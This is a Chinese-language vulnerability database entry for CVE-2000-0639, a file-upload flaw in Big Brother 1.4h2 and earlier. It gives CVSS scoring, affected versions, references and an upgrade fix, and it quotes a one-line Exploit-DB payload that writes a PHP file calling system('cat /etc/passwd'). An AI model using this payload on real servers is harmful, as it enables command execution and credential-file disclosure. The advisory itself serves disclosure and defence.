CVE-2000-0639
CVSS7.5
发布时间 :2000-06-11 00:00:00
修订时间 :2008-09-10 15:05:31
NMCOE    

[原文]The default configuration of Big Brother 1.4h2 and earlier does not include proper access restrictions, which allows remote attackers to execute arbitrary commands by using bbd to upload a file whose extension will cause it to be executed as a CGI script by the web server.


[CNNVD]Big Brother命令任意执行漏洞(CNNVD-200006-052)

        Big Brother 1.4h2版本和更早的版本的默认配置不包含正确的访问限制。远程攻击者通过使用bbd上传文件可以执行任意命令,该文件的扩展导致其被web服务器当做CGI脚本执行。

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:sean_macguire:big_brother:1.3b
cpe:/a:sean_macguire:big_brother:1.09b
cpe:/a:sean_macguire:big_brother:1.0
cpe:/a:sean_macguire:big_brother:1.4h
cpe:/a:sean_macguire:big_brother:1.4h1
cpe:/a:sean_macguire:big_brother:1.4
cpe:/a:sean_macguire:big_brother:1.4g
cpe:/a:sean_macguire:big_brother:1.3
cpe:/a:sean_macguire:big_brother:1.1
cpe:/a:sean_macguire:big_brother:1.2
cpe:/a:sean_macguire:big_brother:1.09d
cpe:/a:sean_macguire:big_brother:1.09c

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0639
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2000-0639
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200006-052
(官方数据源) CNNVD

- 其它链接及资源

http://archives.neohapsis.com/archives/bugtraq/2000-07/0171.html
(VENDOR_ADVISORY)  BUGTRAQ  20000711 Big Brother filename extension vulnerability
http://www.securityfocus.com/bid/1494
(VENDOR_ADVISORY)  BID  1494
http://xforce.iss.net/static/5103.php
(UNKNOWN)  XF  big-brother-filename-extension
http://www.osvdb.org/1472
(UNKNOWN)  OSVDB  1472

- 漏洞信息

Big Brother命令任意执行漏洞
高危 未知
2000-06-11 00:00:00 2005-05-02 00:00:00
远程  
        Big Brother 1.4h2版本和更早的版本的默认配置不包含正确的访问限制。远程攻击者通过使用bbd上传文件可以执行任意命令,该文件的扩展导致其被web服务器当做CGI脚本执行。

- 公告与补丁

        

- 漏洞信息 (20092)

Sean MacGuire Big Brother 1.0/1.3/1.4 CGI File Creation Vulnerability (EDBID:20092)
cgi local
2001-06-11 Verified
0 xternal
N/A [点击下载]
source: http://www.securityfocus.com/bid/1494/info

A vulnerability in Big Brother exists which would allow a user to remotely create CGI scripts which could be requested from the Web Server. These could be used to read files and possibly execute commands on the web server machine. 

./bb 1.2.3.4 "status evil.php3 <?<system(\"cat /etc/passwd\");?>"

will allow viewing of the /etc/passwd upon browsing to http://1.2.3.4/bb/logs/evil.php3.

		

- 漏洞信息

1472
Sean MacGuire Big Brother 1.4 File Creation
Remote / Network Access Input Manipulation
Loss of Integrity Upgrade
Exploit Public Third-party Verified

- 漏洞描述

Sean MacGuire (Quest Software) Big Brother 1.4 H and below allow remote users to create files on the remote host with any file extension, within the web root. This could allow an attacker to create malicious files which will be executed when accessed through a web browser. This could lead to complete system compromise.

- 时间线

2001-06-11 Unknow
Unknow Unknow

- 解决方案

Upgrade to a version of Big Brother newer than 1.4 H or restrict access to authorized users by enabling the $BBHOME/etc/security file.

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站